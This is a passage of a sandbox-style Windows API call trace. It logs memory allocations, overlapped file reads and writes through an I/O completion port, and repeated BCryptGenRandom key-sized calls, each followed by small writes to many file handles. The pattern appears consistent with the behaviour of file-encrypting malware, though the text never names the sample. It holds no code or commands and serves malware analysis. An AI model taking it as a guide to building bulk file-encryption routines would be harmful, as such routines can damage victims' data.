_Size=0x4) returned 0x1fa91d0 [0195.512] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.513] free (_Block=0x1fa91d0) [0195.513] free (_Block=0x1fa2ed8) [0195.513] free (_Block=0x1fa90b8) [0195.513] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.515] CloseHandle (hObject=0x308) returned 1 [0195.515] free (_Block=0x3df0008) [0195.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.515] CloseHandle (hObject=0x2a8) returned 1 [0195.516] free (_Block=0x3f70048) [0195.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0195.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0195.540] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.540] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.540] free (_Block=0x3e305b8) [0195.540] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.540] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.540] free (_Block=0x1fa91d0) [0195.540] free (_Block=0x1fa2ed8) [0195.541] free (_Block=0x1fa90b8) [0195.541] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.541] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.572] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe1f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.600] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe0b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.633] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.645] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.659] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe1f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0195.659] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.674] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe0f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0195.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0195.677] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xe0e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0195.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.107] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.120] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.128] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.140] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0196.140] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.153] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe19, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.155] CloseHandle (hObject=0x308) returned 1 [0196.158] free (_Block=0x1ff1e60) [0196.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.169] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.192] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a23c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.200] CloseHandle (hObject=0x2a4) returned 1 [0196.200] free (_Block=0x1ff1e60) [0196.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.201] CloseHandle (hObject=0x338) returned 1 [0196.201] free (_Block=0x3d70450) [0196.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.204] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.235] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x12600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0196.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.270] CloseHandle (hObject=0x2a4) returned 1 [0196.270] free (_Block=0x3d70450) [0196.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.276] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.276] free (_Block=0x3e305b8) [0196.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.276] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.277] free (_Block=0x1fa91d0) [0196.277] free (_Block=0x1fa2ed8) [0196.277] free (_Block=0x1fa90b8) [0196.277] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.289] CloseHandle (hObject=0x2a4) returned 1 [0196.289] free (_Block=0x3df0008) [0196.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.305] CloseHandle (hObject=0x308) returned 1 [0196.305] free (_Block=0x1ff1e60) [0196.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.314] CloseHandle (hObject=0x338) returned 1 [0196.314] free (_Block=0x3f70048) [0196.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.322] free (_Block=0x3e305b8) [0196.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.322] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.323] free (_Block=0x1fa91d0) [0196.323] free (_Block=0x1fa2ed8) [0196.323] free (_Block=0x1fa90b8) [0196.323] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.338] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x5860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.352] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.352] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.352] free (_Block=0x3e305b8) [0196.352] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.352] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.353] free (_Block=0x1fa91d0) [0196.353] free (_Block=0x1fa2ed8) [0196.353] free (_Block=0x1fa90b8) [0196.353] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.367] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.367] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.367] free (_Block=0x3e305b8) [0196.367] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.367] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.367] free (_Block=0x1fa91d0) [0196.367] free (_Block=0x1fa2ed8) [0196.367] free (_Block=0x1fa90b8) [0196.367] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.368] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x8880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.642] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4746, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.665] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.668] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.668] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.668] free (_Block=0x3e305b8) [0196.668] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.668] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0196.669] free (_Block=0x1fa91d0) [0196.669] free (_Block=0x77d7a8) [0196.669] free (_Block=0x1fa90b8) [0196.669] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.671] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, 